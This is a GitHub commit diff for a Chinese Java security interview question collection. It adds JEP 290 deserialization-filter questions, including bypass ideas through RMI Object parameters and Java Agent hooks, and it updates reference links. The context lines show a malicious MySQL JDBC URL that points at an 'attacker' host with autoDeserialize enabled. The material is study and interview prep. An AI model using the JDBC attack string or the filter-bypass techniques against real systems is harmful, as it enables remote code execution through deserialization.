Skip to content

Commit 10c61f8

Browse files
committed
jep
1 parent d88326d commit 10c61f8

File tree

2 files changed

+23
-3
lines changed

2 files changed

+23
-3
lines changed

README.md

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -20,9 +20,9 @@
2020

2121
## 分类
2222

23-
当前问题总数:81
23+
当前问题总数:83
2424

25-
[Java本身的安全问题 - 16个](https://github.com/4ra1n/JavaSecInterview/tree/master/java)
25+
[Java本身的安全问题 - 18个](https://github.com/4ra1n/JavaSecInterview/tree/master/java)
2626

2727
[Shiro框架相关的安全问题 - 8个](https://github.com/4ra1n/JavaSecInterview/tree/master/shiro)
2828

@@ -54,6 +54,10 @@ https://gv7.me/
5454

5555
https://github.com/safe6Sec/Fastjson
5656

57+
https://y4er.com/
58+
59+
https://paper.seebug.org/1689/
60+
5761
## 其他
5862

5963
1. 师傅们如果需要提交面试题,请参考已有的格式

java/README.md

Lines changed: 17 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -238,4 +238,20 @@ Y4er师傅提到的自定义类加载器配合RMI的一种方式
238238
jdbc:mysql://attacker/db?queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true
239239
```
240240

241-
以上是基本攻击手段,还有一些进阶的内容,例如`allowUrlInLocalInfile``detectCustomCollations`参数
241+
以上是基本攻击手段,还有一些进阶的内容,例如`allowUrlInLocalInfile``detectCustomCollations`参数
242+
243+
244+
245+
### 你知道JDK针对反序列化漏洞做了什么修复嘛(★★★)
246+
247+
`JEP 290`中提供一个限制反序列化的类的机制,黑白名单方式,同时限制反序列化深度和复杂度,为 RMI 导出的对象设置了验证机制。具体实现是提供一个全局过滤器,可以从属性或者配置文件中配置。在`ObjectInputStream`类中增加了一个`serialFilter`属性和一个`filterChcek`函数,其中`serialFilter`就可以理解为过滤器
248+
249+
250+
251+
### JEP 290有没有绕过的办法(★★★★★)
252+
253+
根据`JEP 290`限制的原理,白名单对象包括了:String,Remote,Proxy,UnicaseRef,RMIClientSocketFactory等
254+
255+
如果目标的`RMI`服务暴漏了`Object`参数类型的方法,且该类在白名单中,我们就可以注入Payload进去以绕过检测
256+
257+
另外还一些骚思路,比如想办法改源码,或用`Java Agent`对某些方法`Hook`并更改等

0 commit comments

Comments
 (0)